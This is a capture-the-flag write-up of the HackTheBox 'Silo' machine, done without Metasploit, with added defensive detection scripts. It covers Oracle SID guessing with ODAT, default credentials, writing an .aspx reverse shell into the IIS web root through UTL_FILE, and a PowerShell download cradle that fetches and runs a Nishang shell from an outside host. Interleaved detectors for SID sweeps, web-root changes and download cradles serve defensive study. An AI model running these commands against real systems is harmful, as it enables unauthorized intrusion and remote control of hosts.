
HackTheBox_Silo w/o Metasploit

HTB - Silo

Overview


Enumeration

Nmap Scan Results


Vulnerabilities and Exploitation

Download ODAT

ODAT GitHub Repository


Clone the repository and run the odat.py file:


Fix installation issues (the `crypto`/`pycrypto` packages conflict with the `pycryptodome` package ODAT needs):

```shell
pip3 uninstall crypto
pip3 uninstall pycrypto
pip3 install pycryptodome
```


Guess SID

Use ODAT to guess the SID:

```shell
python3 odat.py sidguesser -s 10.10.10.82 -p 1521
```


Nmap Script for SID

Use an nmap script to find the SID:


The SID is XE.
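From the defender's side, SID guessing is noisy: every wrong guess is recorded by the TNS listener as a failed `establish` with error 12505 (unknown SID) or 12514 (unknown service name), all from one client address within seconds. The script below is an added example, not part of the original writeup or of ODAT; it parses constructed lines in the shape of an Oracle `listener.log` (the exact field layout is an assumption based on the common `* establish * <sid> * <code>` form) and flags a host that fails against many distinct SIDs inside a short window, reporting whether that host then succeeded against a real SID.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed listener.log shape: "<ts> * (CONNECT_DATA=...) * (ADDRESS=...) * establish * <sid> * <code>"
LISTENER_LINE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* .*?"
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\).*?"
    r" \* establish \* (?P<sid>\S+) \* (?P<code>\d+)$"
)

# TNS-12505: listener does not know of the SID; TNS-12514: unknown service name.
UNKNOWN_TARGET_CODES = {"12505", "12514"}

# Constructed sample log: one host sweeps six wrong SIDs in three seconds and
# then hits XE; a second host makes ordinary connections.
SAMPLE_LOG = """\
05-JAN-2018 22:18:01 * (CONNECT_DATA=(SID=ORCL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50001)) * establish * ORCL * 12505
05-JAN-2018 22:18:01 * (CONNECT_DATA=(SID=TEST)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50002)) * establish * TEST * 12505
05-JAN-2018 22:18:02 * (CONNECT_DATA=(SID=PROD)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50003)) * establish * PROD * 12505
05-JAN-2018 22:18:02 * (CONNECT_DATA=(SID=DEV)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50004)) * establish * DEV * 12505
05-JAN-2018 22:18:03 * (CONNECT_DATA=(SID=DB01)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50005)) * establish * DB01 * 12505
05-JAN-2018 22:18:03 * (CONNECT_DATA=(SID=STAGE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50006)) * establish * STAGE * 12505
05-JAN-2018 22:18:04 * (CONNECT_DATA=(SID=XE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=50007)) * establish * XE * 0
05-JAN-2018 22:30:00 * (CONNECT_DATA=(SID=XE)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.5)(PORT=40000)) * establish * XE * 0
05-JAN-2018 22:31:00 * (CONNECT_DATA=(SID=ORCL)) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.5)(PORT=40001)) * establish * ORCL * 12505
"""


def parse_listener_log(text):
    """Turn listener.log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LISTENER_LINE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
            "host": m["host"],
            "sid": m["sid"],
            "code": m["code"],
        })
    return events


def detect_sid_guessing(text, window=timedelta(seconds=60), threshold=5):
    """Alert on any host that fails against >= threshold distinct SIDs inside one window."""
    by_host = defaultdict(list)
    for ev in parse_listener_log(text):
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["code"] in UNKNOWN_TARGET_CODES]
        # Sliding window over the failures, tracking the largest set of distinct SIDs tried.
        start, best = 0, set()
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            tried = {e["sid"] for e in failures[start:end + 1]}
            if len(tried) > len(best):
                best = tried
        if len(best) >= threshold:
            first_fail = failures[0]["ts"]
            # A successful connect from the same host after the sweep tells the
            # analyst which SID the guesser ended up with.
            found = sorted({e["sid"] for e in evs if e["code"] == "0" and e["ts"] >= first_fail})
            alerts.append({"host": host, "distinct_sids_failed": len(best), "sid_found": found})
    return alerts


if __name__ == "__main__":
    for alert in detect_sid_guessing(SAMPLE_LOG):
        print(alert)
```

The window and threshold are tuning knobs: a misconfigured client typically fails against one wrong SID repeatedly, while a guesser fails against many different ones, so counting distinct SIDs rather than raw failures keeps false positives down.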

Check password guessing options:


Update the wordlist to include uppercase characters:


Format the wordlist properly:


Password Guessing

Guess the password using the updated list:


Valid credentials: scott/tiger

Use the credentials to connect to the database:

```shell
sqlplus64 scott/tiger@10.10.10.82:1521/XE
```


Privilege Escalation

Check user privileges:


Use ODAT to upload a reverse shell (the `utlfile` module takes the remote directory, the remote file name and the local file; the `--sysdba` flag is needed because `scott` itself cannot write to the web root):

```shell
python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile C:\inetpub\wwwroot muq.aspx muq.aspx --sysdba
```


Visit the page to access the reverse shell:

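The step above works because a database account with `UTL_FILE` access (here via `--sysdba`) can write arbitrary files into the IIS web root, and IIS will happily execute a dropped `.aspx` page. A cheap control on the defender's side is a file-integrity baseline of the web root that treats any new or changed server-side script as high severity. The script below is an added example and not part of the original writeup; it builds the baseline in a constructed temporary directory rather than a real `C:\inetpub\wwwroot`, and the set of flagged extensions is an assumption.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumed list of server-side script extensions worth a high-severity alert.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}


def snapshot_webroot(root):
    """Map each file under root (relative path) to its SHA-256 digest."""
    root = Path(root)
    snap = {}
    for p in root.rglob("*"):
        if p.is_file():
            snap[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return snap


def diff_webroot(baseline, current):
    """Compare two snapshots; new or modified script files are rated high."""
    findings = []
    for rel, digest in current.items():
        if rel not in baseline:
            change = "added"
        elif baseline[rel] != digest:
            change = "modified"
        else:
            continue
        severity = "high" if Path(rel).suffix.lower() in SCRIPT_EXTENSIONS else "info"
        findings.append({"path": rel, "change": change, "severity": severity})
    for rel in baseline:
        if rel not in current:
            findings.append({"path": rel, "change": "removed", "severity": "info"})
    return sorted(findings, key=lambda f: f["path"])


def demo():
    """Constructed scenario: baseline a small web root, then drop a page and alter an image."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Default.aspx").write_text("<html>welcome</html>")
        (root / "logo.png").write_bytes(b"\x89PNG placeholder")
        baseline = snapshot_webroot(root)

        # Simulate what a database-side file write into the web root would leave behind.
        (root / "dropped.aspx").write_text("<%@ Page %> constructed marker, not a real page")
        (root / "logo.png").write_bytes(b"\x89PNG changed")
        return diff_webroot(baseline, snapshot_webroot(root))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the baseline dictionary is written out (for example as JSON) after each legitimate deployment and the comparison runs on a schedule; the complementary fix is to remove `UTL_FILE` grants and directory objects that point at the web root, so the database has no path to drop files there in the first place.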

Nishang Shell

Download the Nishang shell:

Nishang GitHub Repository

Append a line that invokes the shell to the end of the script, then confirm it with `tail`:

```shell
tail -1 Invoke-PowerShellTcp.ps1
```


Triggering the Webshell

Use the webshell to download and execute the Nishang shell:

```powershell
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/nish.ps1')
```

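That one-liner is a textbook download cradle: fetch a script over HTTP and hand it straight to `Invoke-Expression` so nothing touches disk. With PowerShell ScriptBlock logging enabled, the full text lands in Event ID 4104 of the `Microsoft-Windows-PowerShell/Operational` log, where it is easy to spot. The script below is an added example (not from the writeup or from Nishang): it runs a small set of indicator regexes over constructed 4104-style records (the record layout is simplified, only the `ScriptBlockText` field is used) and rates a block "high" when a download primitive and an execution primitive appear together, or when decoding and execution do.

```python
import re

# Constructed records in the shape of Event 4104; only ScriptBlockText is consulted.
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText": "Get-ChildItem C:\\inetpub\\wwwroot"},
    {"id": 2, "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/nish.ps1')"},
    {"id": 3, "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.test/pkg.msi -OutFile C:\\Temp\\pkg.msi"},
    {"id": 4, "ScriptBlockText": "$c = [Convert]::FromBase64String($b); Invoke-Expression ([Text.Encoding]::Unicode.GetString($c))"},
]

# Indicator families; each regex is case-insensitive because PowerShell is.
INDICATORS = {
    "download": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "execute": re.compile(r"Invoke-Expression|\bIEX\b|Invoke-Command", re.I),
    "decode": re.compile(r"FromBase64String|-EncodedCommand|\s-e(nc)?\s", re.I),
}


def classify_scriptblock(text):
    """Return the set of indicator families present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def severity(tags):
    """Fetch-and-run or decode-and-run is high; any single family alone is medium."""
    if "download" in tags and "execute" in tags:
        return "high"
    if "decode" in tags and "execute" in tags:
        return "high"
    if tags:
        return "medium"
    return None


def find_suspicious_scriptblocks(events):
    """Scan 4104-style records and return the ones worth an analyst's attention."""
    hits = []
    for ev in events:
        tags = classify_scriptblock(ev["ScriptBlockText"])
        sev = severity(tags)
        if sev:
            hits.append({"id": ev["id"], "severity": sev, "tags": sorted(tags)})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_scriptblocks(SAMPLE_EVENTS):
        print(hit)
```

The "medium" tier exists because a plain `Invoke-WebRequest -OutFile` is common in legitimate administration; it becomes interesting only when paired with execution, so the pairing, not the individual cmdlet, is what carries the signal. The same regexes apply to Sysmon Event ID 1 command lines when the cradle is passed as an argument to `powershell.exe`, as in the writeup.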

User Flag

Get the user flag:


Check whether the password's characters are being displayed correctly:


Memory Dump Analysis

Get the OS version so the right Volatility profile can be chosen:


Clone and install Volatility:

```shell
git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
python2 setup.py install
```

Identify the memory dump's profile with Volatility:

```shell
python2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp imageinfo
```

Check processes in the memory dump:


Use the Win2012R2x64 profile to check the process tree:

```shell
python2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp --profile Win2012R2x64 pstree
```


Dump a file object from memory by its offset (`-Q`) into a directory (`-D`):

```shell
python2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp --profile Win2012R2x64 dumpfiles -Q 0x12345678 -D /tmp/
```

Analyze the extracted file:

```shell
strings /tmp/extracted_file > strings.txt
```

Root Flag


This post is licensed under CC BY 4.0 by the author.
